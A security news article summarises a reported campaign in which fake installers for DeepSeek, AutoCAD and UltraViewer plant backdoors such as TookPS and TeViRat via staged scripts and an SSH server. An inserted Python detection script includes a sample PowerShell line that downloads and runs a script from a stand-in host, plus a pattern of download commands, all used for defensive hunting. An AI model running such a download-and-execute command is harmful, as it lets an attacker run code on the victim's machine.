5 Alarming Ways Fake AI and Business Tools are Deploying Backdoors into Your System

Overview of the Cybersecurity Threat

Kaspersky has reported a campaign that uses counterfeit downloads of popular applications, among them DeepSeek, AutoCAD and UltraViewer, as decoys to deliver backdoors. The goal is unauthorized remote access: the fake installers look like legitimate business tools, but what they install hands control of the machine to the attacker.

Deep Dive into the Malware Campaign

According to Kaspersky's latest blog post, the campaign deploys several backdoors, each of which gives the attacker remote access to the victim's system. The backdoors are distributed through forged versions of well-known software tools.

The Fake Applications Leveraged

  • DeepSeek – the open-source large language model; fake DeepSeek downloads are used to spread the TookPS backdoor.
  • AutoCAD and SketchUp – offered as "free" downloads; the fake installers launch malicious scripts.
  • UltraViewer – offered as a free remote-access tool; the fake installer drops a loader that fetches further malicious scripts.

The Execution Process

The infection chain is staged: an initial script downloads the components the attack needs, and further scripts install and start an SSH server on the victim's machine. That SSH server gives the attacker an encrypted channel for remote access and command execution. Because the channel is encrypted, network content inspection will not show what passes over it; the practical detection opportunity is on the host, where an SSH server appears that nobody installed.
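As an added illustration (not code from the page or from Kaspersky's report), the following Python shows how to hunt for that chain in process-creation telemetry: it flags an SSH server binary started from a directory where none should be, or whose parent chain includes a PowerShell process that ran a download command. The event records, paths, hostnames, PIDs and the example.invalid URL are constructed for the example; the list of trusted directories and the download-command pattern are assumptions to tune for your own environment.

```python
import re
from typing import Dict, Iterator, List, Tuple

# Constructed process-creation events (Sysmon Event ID 1 style, reduced to the fields
# the logic needs). Paths, hostnames, PIDs and the domain are made up for this example;
# they are not indicators from the page or from Kaspersky's report.
SAMPLE_EVENTS: List[Dict] = [
    {"ts": "2025-04-01T09:12:01Z", "host": "ws-17", "pid": 4120, "ppid": 3980,
     "image": r"C:\Users\alice\Downloads\UltraViewer_setup.exe",
     "cmdline": "UltraViewer_setup.exe"},
    {"ts": "2025-04-01T09:12:03Z", "host": "ws-17", "pid": 4133, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr http://example.invalid/s1.ps1 -OutFile s1.ps1; .\\s1.ps1"'},
    {"ts": "2025-04-01T09:12:09Z", "host": "ws-17", "pid": 4150, "ppid": 4133,
     "image": r"C:\Users\alice\AppData\Local\Temp\ssh\sshd.exe",
     "cmdline": "sshd.exe -f sshd_config"},
    # Benign: OpenSSH Server installed by an administrator under the normal system path.
    {"ts": "2025-04-01T10:00:00Z", "host": "srv-02", "pid": 900, "ppid": 4,
     "image": r"C:\Windows\System32\OpenSSH\sshd.exe", "cmdline": "sshd.exe"},
    # Benign: a scripted download with no SSH server following it.
    {"ts": "2025-04-01T10:05:00Z", "host": "ws-03", "pid": 2200, "ppid": 2100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv"},
]

# Directories where an SSH server binary is expected on a managed Windows host
# (assumption: adjust if your estate deploys OpenSSH somewhere else).
TRUSTED_SSHD_DIRS: Tuple[str, ...] = (
    "c:\\windows\\system32\\openssh\\",
    "c:\\program files\\openssh\\",
)

SSH_SERVER_IMAGES = {"sshd.exe"}

# Command-line primitives commonly used to fetch a payload from PowerShell (assumed list).
DOWNLOAD_PATTERN = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return image.lower().rsplit("\\", 1)[-1]


def is_ssh_server(event: Dict) -> bool:
    return basename(event["image"]) in SSH_SERVER_IMAGES


def from_trusted_dir(event: Dict) -> bool:
    return event["image"].lower().startswith(TRUSTED_SSHD_DIRS)


def ancestors(event: Dict, by_key: Dict[Tuple[str, int], Dict]) -> Iterator[Dict]:
    """Walk the parent chain on the same host; stop at a missing parent or a cycle.
    Simplification: PID reuse is ignored. A real pipeline keys on process GUIDs."""
    seen = set()
    cur = event
    while True:
        key = (cur["host"], cur["ppid"])
        if key in seen or key not in by_key:
            return
        seen.add(key)
        cur = by_key[key]
        yield cur


def find_suspicious(events: List[Dict]) -> List[Dict]:
    """Flag SSH server processes that start from an untrusted path or descend from a
    PowerShell process that downloaded something: the two host-side traces of the chain."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    alerts = []
    for e in events:
        if not is_ssh_server(e):
            continue
        reasons = []
        if not from_trusted_dir(e):
            reasons.append("SSH server started from untrusted path")
        for anc in ancestors(e, by_key):
            if basename(anc["image"]) == "powershell.exe" and DOWNLOAD_PATTERN.search(anc["cmdline"]):
                reasons.append(f"ancestor pid {anc['pid']} is PowerShell running a download command")
                break
        if reasons:
            alerts.append({"host": e["host"], "pid": e["pid"], "image": e["image"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_EVENTS):
        print(f"{alert['host']} pid {alert['pid']} {alert['image']}: " + "; ".join(alert["reasons"]))
```

On the constructed sample, only the sshd.exe started under the user's Temp directory is reported, with both reasons attached; the administrator-installed OpenSSH server and the lone PowerShell download are left alone. The two checks are deliberately independent so that an SSH server dropped by some other loader, or one planted under a trusted path by an attacker with write access there, still trips at least one of them.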

Backdoors Deployed

  • TeViRat – loaded by DLL sideloading; it subverts a legitimate TeamViewer installation so the attacker can use it for remote access.
  • Lapmon – a second backdoor; how it is delivered has not yet been determined.

Impact and Implications

These campaigns trade on the popularity and trusted reputation of the impersonated applications to get users to install counterfeit versions. Once a backdoor is in place, the attacker has persistent remote access and can run commands on the individual's or organization's systems.

Conclusion and Safety Measures

These campaigns keep evolving, so verifying the authenticity of downloaded software matters more than ever: download only from the vendor's official site, check the installer's digital signature or the hash the vendor publishes before running it, and treat "free" copies of paid tools such as AutoCAD as suspect by default. Organizations should back this up with application control and with host monitoring for remote-access services, such as an SSH server, that nobody deployed.

For the full analysis and recommended security measures, refer to Kaspersky's detailed report on the campaign.

Related: 5 Alarming Ways Hunters International is Pivoting From Ransomware to Data Extortion

Last Updated: April 3, 2025